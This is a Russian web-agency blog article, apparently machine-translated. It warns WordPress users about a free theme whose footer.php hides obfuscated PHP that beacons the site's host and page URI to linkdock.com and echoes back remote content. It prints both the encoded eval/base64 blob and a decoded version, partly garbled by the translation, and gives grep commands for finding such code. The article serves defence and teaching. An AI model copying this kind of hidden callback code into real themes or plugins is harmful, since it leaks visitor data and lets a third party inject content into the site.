Код шпионского ПО в Wordpress | ВесьТоп создание и продвижение сайтов

Поддержка сайта

Высокие позиции в поисковой системе, на прямую зависят от развития вашего сайта.

Продвижение сайтов

Эффективность стратегий продвижения подтверждается сотрудничеством с крупными клиентами и отзывами о нашей работе.

Создание сайтов

Мы делаем сайты быстро, недорого и профессионально. От работы с нами, у вас останутся только положительные эмоции.

Код шпионского ПО в WordPress

Код шпионского ПО в WordPress

Код отслеживания

Я пишу эту статью для всех пользователей WordPress, которые не любят подписываться на них без их ведома.

Проблема:

Бесплатная тема WordPress под названием Red_wave от AskGraphics распространяется бесплатно на сайте http://wordpresstemplates.name, но я обнаружил, что она содержит следующий запутанный код PHP в файле footer.php:

Eval (gzinflate (base64_decode ( ‘vZHRasIwFIavV / AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7 / с + Х / 3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW / r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5 К + 0EmWzfhkOs / oaxTTcG3kH2CaPOXJPON5 + uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNS Se / o3KiJhSMq1Fk6i5rCV1llGS6mAHub2UPfZ + d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqmodSM0h5p4 HPji35xUPBWrl1S + F6F + HzHMbbgsPYDUfXI2E + ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A’)));

(Все в одной строке).

На самом деле это следующий зашифрованный код отслеживания PHP:

error_reporting (0); $ CodeURL = "http://linkdock.com/content.php?id=& host =".urlencode ($ _ СЕРВЕР ["HTTP_HOST"])."& uri =".urlencode ($ _ СЕРВЕР ["REQUEST_URI"]); если ((intval (get_cfg_var ("allow_url_fopen")) || intval (ini_get ("allow_url_fopen"))) && function_exists ("file_get_contents")) {echo @file_get_contents ($ CodeURL); } elseif ((intval (get_cfg_var ("allow_url_fopen")) || intval (ini_get ("allow_url_fopen"))) && function_exists ("файл")) {$ content = @file ($ CodeURL); эхо @join ("", $ content); } elseif (function_exists ("curl_init")) {$ ch = curl_init ($ CodeURL); curl_setopt ($ ch, CURLOPT_HEADER, 0); curl_exec ($ ch); curl_close ($ ch); }

Как видите, этот скрипт отправляет на сервер linkdock.com не только имя вашего домена, но и точную страницу, которую в данный момент открывает посетитель.

Почему они это делают?

С помощью этого кода они получают интернет-трафик с различных уникальных IP-адресов, что отражается в статистике их сервера. Сообщается о большем количестве посещений, и сервер может продавать свою рекламу дороже.

Ответ:

Просто удалите эту строку из файла wp-content / themes / Red_wave / footer.php

В этом случае скрипт не причинит никакого вреда, за исключением того, что он излишне замедляет загрузку каждой страницы блога, и если противоположный сервер будет перегружен, это приведет к очень долгой загрузке страниц вашего блога, и нижняя часть сайта может сломаться и сместиться. . Если ваш блог слишком часто работает слишком медленно, бот Google не понравится, и ваш сайт может попасть в поисковую выдачу.

Этот метод часто используется, чтобы позволить автору плагина встроить ссылку на свой сайт, которую нелегко найти и удалить, но злонамеренный сайт может распространять бесплатные шаблоны или плагины WordPress, которые могут нанести вред сайту, например например, удалить все статьи.

Общие советы по безопасности

Пусть эта статья станет предупреждением для всех, кто использует шаблоны или плагины из непроверенного источника. Я советую вам после загрузки темы или плагина сначала поискать в тексте всех файлов опасные функции, такие как eval (). В Linux для этого нужно войти в каталог wp-content из консоли и найти его с помощью команды:

grep —include = * .php -r "eval (" *

Эта команда не должна ничего выводить. Если вы перейдете в каталог в основной веб-каталог и снова запустите команду, будет несколько результатов, но повод для беспокойства есть только в том случае, если они содержат base64_decode или gzinflate. Вы можете проверить это с помощью команды:

grep —include = * .php -r "eval (" * | grep -e "base64_decode \ | gzinflate"

Если у eval есть закодированная строка, подобная приведенной выше, и вы не знаете, как ее проверить, вам лучше не использовать эту тему или плагин. Чем красивее и профессиональнее выглядит шаблон, тем больше у вас будет соблазна встроить его в свой блог, но вы же не хотите, чтобы ваши данные страдали, не так ли? Знайте, что это возможно и очень легко сделать.

Другая проблема безопасности — это небрежно написанный код, создающий брешь в безопасности без ведома разработчика программного обеспечения. Вероятно, 95% случаев взлома сайтов связаны с этим. Каждый дополнительный плагин, который вы добавляете, увеличивает вероятность создания дыры в безопасности на вашем сайте, поэтому не устанавливайте плагины, которые вы не используете или которые вы используете очень редко.

В более старых версиях WordPress были дыры в безопасности, и они, вероятно, появятся в будущем. Многие думают, что, загрузив последнюю версию программного обеспечения, они защищены, но это не всегда так.

Правило обновления программного обеспечения

Вот простое правило обновления, которое применяется не только к WordPress, но и к любому программному обеспечению: в настоящее время последняя версия WordPress — 2.8.4, и если выходит новая версия 2.8.x, например 2.8.5 или 2.8.6, она обычно закрывает дыры. в безопасности и исправляет ошибки, поэтому рекомендуется сразу установить его. Например, 2.8.4 исправляет дыру в безопасности в версиях lt; = 2.8.3, который может изменить пароль администратора, поэтому немедленно обновитесь до этой версии.

Но если выходит версия с новым номером, например, 2.9 (или даже 3.0), очень вероятно, что такая версия имеет дыры в безопасности, и лучше дождаться версии 2.9.1 или даже 2.9.2 и только потом обновлять программное обеспечение. Таким образом вы значительно снизите риск.

Читайте так же:
Not found

Нам доверяют

Интернет магазин